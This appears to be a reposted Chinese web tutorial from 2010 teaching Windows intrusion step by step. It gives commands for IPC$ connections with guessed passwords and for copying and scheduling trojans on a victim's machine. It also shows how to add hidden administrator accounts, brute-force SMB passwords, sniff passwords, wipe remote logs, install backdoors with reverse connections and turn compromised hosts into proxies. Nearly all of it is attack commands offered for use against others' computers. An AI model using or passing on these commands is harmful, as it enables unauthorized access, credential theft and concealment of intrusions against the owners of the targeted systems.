返回首页
[登录] [注册]
网站首页 >> 微博营销 >> 五分PK10 >> 文章内容

windows下dos攻击、入浸命令讲解

[日期:2010-08-14]   来源:碧波荡漾网  作者:碧波荡漾网   [字体: 五分PK10计划 ]

  一些常用的net命令与例子:ip地址我就以192.168.1.1为例了,一般像我们不能连接却不能进行其它的操作时,可以把防火墙给关掉net stop

  sharedaccess

  1、建立ipC连接或是直接映射的命令

  net use \\ip\ipc$ password /user:username

  net use \\ip\abc username:admin$123

  例如:

  net use \\192.168.1.1\ipc$ 123456 /user :administrator

  这个命令的意思就是与用户名为adminidtrator用户密码为123456的主机192.168.1.1建立ipc$空连接

  2、 删除ipC$空连接

  net use \\ip /del

  例如:

  net use \\192.168.1.1 /del

  删除与主机127.0.0.1已经建立的ipc$连接

  3、启动关闭服务:

  net start    \\查看已经开启的服务

  net start servername

  net stop servername

  例如:

  net start telnet   \\开启telnet服务

  net stop telnet    \\关闭telnet服务

  4、启动关闭共享

  net shate ipc$    \\开启ipc$默认共享

  net share ipc$ /del   \\关闭ipc$默认共享

  net share c=c:\    \\完全共享c盘

  net share d=d:\    \\删除完全共享的d盘

  net share e$=e:\   \\建立隐藏共享e盘

  5、映射硬盘

  net use z: \\ip\c$

  例如:

  net use z: \\192.168.1.1\c$    \\把192.168.1.1的C盘映射成本机的z盘

  说明:映射成功后,你在我的电脑里面里面就会多出一个硬盘Z,其实Z就是192.168.1.1的C盘!

  net use z: /del      \\断开映射

  入侵中的作用:把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了

  成功实现的条件:必须与对方建立ipc$连接

  6、远程复制文件_Copy

  Copy e:\3389.exe \\192.168.1.1\c$   \\将本地的E盘下的3389.exe这个文件copy到对方192.168.1.1系统的C盘根目录下

  Copy在入侵中的作用:把本地文件复制到对方硬盘

  Copy复制成功所需的条件:必须与主机建立ipc$连接

  7、 查看远程系统的时间

  net time \\ip

  net time \\192.168.1.1    \\查看远程主机192.168.1.1的本地时间

  作用:得到对方时间好为自己计划任务种下木马做准备

  8、 远程运行程序

  At \\ip time server.exe

  At \\192.168.1.1 12:30 c:\server.exe    \\让主机在中午12:30分运行我们已经复制到他C盘根目录下的木马server.exe

  在入侵中作用:这样我们就可以用我们的木马服务端来连接我们木马,,更好的使用图形方式来控制肉鸡.(推荐使用神气儿 ^_^)

  9、添加管理员帐号:

  net user ylinuxs 123456 /add    \\添加一个密码为123456名字为 ylinuxs的用户

  net localgroup administrators ylinuxs /add   \\把ylinuxs这个用户提升为管理员或是叫加入到管理员组都是对的

  注意:有些系统的管理员组不是administrators你要根据实际情况来改,不过99.9%的系统的管理员组还是administrators的。

  修改用户密码:

  net user ylinuxs 123    \\把用户ylinuxs的密码修改成123

  10、远程登陆主机_telnet

  telnet ip port

  例如:telnet 192.168.1.1 135   \\连接登录192.168.1.1的135端口

  (当目标主机的端口是默认的23的时候我们不需要+端口即:telnet ip 就好)

  11、传输文件命令_ftp

  其实这个我个人觉得用途不大,毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图形截面的交互如何不好呢?

  首先在CMD里面输入ftp

  然后输入:open ip port

  例如:open 192.168.1.1 123    \\连接登陆192.168.1.1的123端口

  如何开启windows系统自带的ftp服务:

  net start msftppsvc

  12、 查看文件夹的属性_cacls

  Cacls ylinuxs    \\查看ylinuxs这个文件夹的属性

  参数说明:F:(完全控制)R:(只读)C:(允许更改)W:(允许写入)N:(没有任何权限)

  13、删除文件_del

  del是用来删除文件命令

  首先进入你想删除的文件的目录

  del ylinuxs.txt   \\删除ylinuxs.txt这个个文件

  del ylinuxs.txt /f \\强制删除ylinuxs.txt这个个文件(当该文件无{MOD}常删除的时候使用该命令)

  14、 finger命令

  Finger是一个信息刺探命令一般在对方开启了79端口时命令使用

  Finger –l user @computer

  参数详解: -l 用长列表格式显示消息

  User:指定用户的信息

  成功实现的条件:对方必须安装tcp/ip协议

  15、文件写入命令_echo:

  Echo hello > index.htm   \\用hello来覆盖index.htm的内容

  Echo hello >>index.htm   \\将hello添加到index.htm

  16、写入注册表文件_regedit

  Regedit /s filename.reg \\s是写入参数

  17、端口映射_chgport

  Chgport 3=5   \\将端口3映射到5

  Chgport /d*   \\删除所有端口映射

  18、文件映射_subst

  subst b: c:\windows \\这个时候当你访问硬盘b的时候你就是访问了 c:\windows目录了,不过这样是非常危险的

  subst b: /D   \\删除映射的盘b

  19、查看当前正在使用的帐号:

  query session   \\查看帐号

  20、踢掉指定用:

  logoff id    \\注意ID,是在用query session查看到的用户的id而不是用户名。

  21发送消息给某用户或者内网主机

  net send hostname or /ip message

  例如:net send ylinuxs or /192.168.1.1 hello!   \\给主机名为ylinuxs或是ip为192.168.1.1发送消息为hello!

  CMD的内部基本入侵命令讲解完毕,现在我们来讲讲他的外部命令,也就是借用外部DOS小工具的方法:

  (二)CMD外部一部分小工具的使用方法:

  1、opentelnet:一个在得到对方用户名与密码的情况下远程开启对方telnet的程序

  命令语法:opentelnet \\ip username pass ntml port

  例    子:opentelnet \\192.168.1.1 administrator 123456 1 3800

  开启主机192.168.1.1的telnet服务,并且端口设置在3800(当连接的时候就需要telnet 192.168.1.1 3800了)1是NTML的验证值,就是说,我们需要

  输入登陆用户名与密码才能登陆。

  该命令成功实现的条件:对方没有装防火墙,并且ipC$服务开启

  telnet.vbe:一个不基于ipC$是否开启直接开telnet的工具

  命令语法:cscript telnet.vbe 192.168.1.1 username pass ntml port

  这个与上面哪个opentelnet的使用含义是一样的

  该命令成功实现的条件:对方没有装防火墙

  2、Pslist:查看系统进程的工具或是windows内部自带的tasklist命令

  Pskill:杀除系统进程的工具或是windows内部自带的taskkill命令

  进入工具目录直接输入:pslist即可以查看系统进程如下图:

  杀死或叫结束进程

  Pskill pid 进程号

  taskkill /PID 进程号   \\若结束不了,可加上/F强行结束

  3、fport:一个查看系统程序所对应的端口的工具或windows自带的netstat 或加上-an参数

  4、远程删除日志:

  Cleanlog.vbe

  命令语法:

  Cscript cleanlog.vbe ip username pass system –all   \\删除系统日志

  Cscript cleanlog.vbe ip username pass application –all   \\删除应用程序日志

  Cscript cleanlog.vbe ip username pass secutity –all   \\删除安全日志

  使用的优势:无须对方开启ipc$共享

  5、远程开启关闭重启主机:

  Reboot.vbe

  Cscript Reboot.vbe ip username pass –r   \\重启目标主机

  Cscript Reboot.vbe ip username pass –s   \\关闭目标主机

  Cscript Reboot.vbe ip username pass –I   \\注销目标当前用户

  Cscript Reboot.vbe ip username pass –p   \\关闭目标电源

  使用的优势:无须对方开启ipc$共享

  6、端口重定rinetd and fpipe

  首先说说rinetd的使用

  首先我们配置一个文件ylinuxs.txt这样配置一般都很简单,一般下载下来的软件里面都有说明的,只须按照它所说的步骤一步步来就可以了。

  ylinuxs.txt内容如下:

  ip1 21 ip2 3389   //释:ip1是主机ip ip2是要接受的内网主机ip,既整个命令的意思是当你连接ip1主机(公网ip)的21端口的时候,主机一(ip1

  )会把他21端口接收到数据发到内网主机(ip2)的3389。也就是你连接ip1主机的21端口,实际上就是连接ip2的3389端口。

  命令:rinetd.exe –c ylinuxs.txt

  工具2:fpipe

  使用命令:fpipe –v –l 53 s 53 –r 23 主机ip

  例子:fpipe –l 80 –s 90 –r 80 127.0.0.1

  释:将本机的80端口接收到的数据通过本机的90端口直接转发到127.0.0.1的80端口

  7、SNMP弱口令的利用:

  工具:Snmputil

  Snmputil [get|getnext|walk]agent id     \\语法格式

  Snmputil walk 192.168.1.1 ylinuxs.1.3.6.1.4.1.77.1.2.25.1.5   \\查询帐户

  Snmputil walk 对方ip public.1.3.6.1.2.1.25.4.2.1.2   \\查询系统进程

  Snmputil walk 对方ip public.1.3.6.1.4.1.77.1.2.25.1.1   \\查询用户列表

  Snmputil walk 对方ip public .1.3.6.1.2.1.1    \\列出对方系统信息

  该工具的作用:查询一部分系统而已

  我个人这个没有很大的作用,查看到了系统信息,要攻破还是需要运气

  8、暴力破解系统密码

  Smbcrack

  Smbcrack ip username 字典路径 端口

  说明:首先你需要用字典自己做一个字典,用户名建议是administrator 因为这个是系统默认的管理员估计大多数人的主机这个帐号还是存在的,端

  口可以是139、137、445等系统开启的netBOIS协议端口就可以!

  9、小巧的嗅叹器_xsniff(若有需要还可以用sniffer,对于sniffer全是英文的,没有一个月,一般人拿来用处不大,若你精通了,那可就厉害了,若想

  下载或是想学习去http://hi.baidu.com/ylinuxs/blog/item/2202cb408ef79c1c9313c634.html,上面有说明文件.)

  Xsniff是一个小巧的嗅叹器,可以嗅叹UDP/TCP协议的信息

  使用语法:

  Xsniff –pass –hide –log c:\pass.log –pass

  c:\pass.log 是保存记录文件,建议选择一个深的目录,可以自定义

  性能参数:

  -hide 隐藏在后台运行          -log:生成嗅叹的日志文档

  Pass.log:嗅叹的日志文档文档名,可以自定义

  -TCP:捕获TCP数据包

  -UDP:捕获UDP数据包

  -ICMP:捕获ICMP数据包

  -HOST:主机名或ip地址

  -PORT:指定端口嗅叹

  -ASC输出出时保存为ASCII格式

  10、SFIND 命令行扫描器

  例子:

  Sfind –p 3389 192.168.1.1 192.168.1.255

  扫描192.168.1.1段的1-255主机的3389端口

  Sfind –cgi 192.168.1.1    //扫描192.168.1.1的cgi漏洞

  Sfind –ftp 192.168.1.1    //扫描192.168.1.1的ftp漏洞

  Sfind –idq 192.168.1.1    //扫描192.168.1.1的idg漏洞

  11、克隆帐号CA:

  CA.EXE \\ip administrator “” guest 123

  将GUEST帐号克隆成管理员

  Administrator 的密码为空用”” guest的密码是123

  12、后门使用:

  这里我介绍小榕的bits

  说明:BITS必须放在system32目录下才可以安装

  安装命令:rundll32.exe BITS.dll install rasato ylinuxs \\指定后门特征为ylinuxs

  连接激活:

  正向连接(用nc连接即可):ylinuxs:@ip[xell]:99

  反向连接:ylinuxs:@ip[rxell]:yourip:port

  卸载:rundll32.exe BITS.dll uninstall

  同时也介绍T-CMD

  安装命令:

  t-cmd –install

  然后:telnet ip 20540

  就可以了,T-CMD是菜鸟的好选择

  13、系统密码查看_showpass

  直接进入showpass的目录直接运行showpass只要当前用户在线,那么showpass就可以把他的密码从内存里找出来。

  14、代理肉鸡的制作_SK

  安装命令:

  sk.exe –install   \\安装SK

  sk.exe -config port 4999 \\设置端口为4999

  sk.exe -config starttype 2 \\设置启动项为自启动

  net start skserver   \\启动SK代理服务

  15、SQL弱口令利用

  我本来在这里不想说这个,但是希望大家能够综合利用所以我就直接说了。(SQL的弱口令大家可以用WINDOWS 2000自动攻击探测器扫描.)

  Sqlexeca.exe ip sa 123

  因为是弱口令,所以用123表示,同时也告诉大家SQL服务器的最高权限帐户是SA,这个是不能更改的!

  16、终端服务的开启与使用

  这个恐怕就是菜鸟们最喜欢的话题了一个图形话的交互界面

  工具:3389.exe 3389.vbe 3389.bat

  方法一:3389.exe:只需要把此文件复制到你所要开启的服务器运行此程序就可以了。

  方法二:3389.vbe:这个是一个脚本文件,使用方法如下:

  Cscript 3389.vbe ip username pass port /r    //密码必须是管理员密码 port是终端的端口,这个是可以自己定义的,参数.r是说

  明开启成功自动重启动服务器!你也可以使用/fr,FR的意思就是强制重新启动服务器!

  方法三:3389.bat:这个是一个BAT文件利用批处理来开3389网络上很多相关资料大家可以参考参考,3389.bat的内容如下:

  echo [components] > d:\ylinuxs

  echo tsenable=on >> d:\ylinuxs

  sysocmgr /i:d:\winnt\inf\sysoc.inf /u:d:\ylinuxs /q

  大家可以把上述代码保存一个bat然后放到要开3389的服务器上,在CMD下运行,服务器的3389就开启了。

  终端的连接:

  这里推荐使用2003或者XP的终端登陆器,然后系统会提示你输入帐号与密码,输入以后直接登陆就可以了!

相关文章
相关评论